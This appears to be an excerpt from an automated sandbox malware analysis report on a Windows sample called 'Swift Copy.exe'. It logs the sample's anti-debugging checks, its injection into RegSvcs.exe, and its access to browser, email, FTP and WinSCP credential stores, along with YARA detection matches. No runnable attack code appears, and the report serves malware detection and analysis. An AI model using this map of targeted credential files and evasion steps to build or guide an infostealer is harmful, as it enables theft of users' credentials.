                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DDDBBE
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE68EE FindFirstFileW,FindClose,0_2_00DE68EE
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DE698F
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD076
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD3A9
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE9642
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE979D
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DE9B2B
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DE5C97
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D742DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98998Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98823Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98169Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97620Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96530Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94778Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94562Jump to behavior
                    Source: RegSvcs.exe, 00000001.00000002.4146234041.00000000065B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DEEAA2 BlockInput,0_2_00DEEAA2
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DA2622
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D742DE
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D94CE8 mov eax, dword ptr fs:[00000030h]0_2_00D94CE8
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00ED34B0 mov eax, dword ptr fs:[00000030h]0_2_00ED34B0
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00ED3510 mov eax, dword ptr fs:[00000030h]0_2_00ED3510
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00ED1E70 mov eax, dword ptr fs:[00000030h]0_2_00ED1E70
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DD0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00DD0B62
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DA2622
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D9083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D9083F
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D909D5 SetUnhandledExceptionFilter,0_2_00D909D5
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D90C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D90C21
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10B0008Jump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DD1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00DD1201
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DB2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DB2BA5
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDB226 SendInput,keybd_event,0_2_00DDB226
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DF22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00DF22DA
                    Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Swift Copy.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DD0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00DD0B62
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DD1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00DD1663
                    Source: Swift Copy.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Swift Copy.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D90698 cpuid 0_2_00D90698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00DE8195
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DCD27A GetUserNameW,0_2_00DCD27A
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00DABB6F
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D742DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Swift Copy.exe.ee0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4142550881.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Swift Copy.exe PID: 1060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2840, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Swift Copy.exeBinary or memory string: WIN_81
                    Source: Swift Copy.exeBinary or memory string: WIN_XP
                    Source: Swift Copy.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                    Source: Swift Copy.exeBinary or memory string: WIN_XPe
                    Source: Swift Copy.exeBinary or memory string: WIN_VISTA
                    Source: Swift Copy.exeBinary or memory string: WIN_7
                    Source: Swift Copy.exeBinary or memory string: WIN_8
                    Source: Yara matchFile source: 0.2.Swift Copy.exe.ee0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4142550881.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Swift Copy.exe PID: 1060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2840, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Swift Copy.exe.ee0000.1.unpack, type: UNPACKEDPE
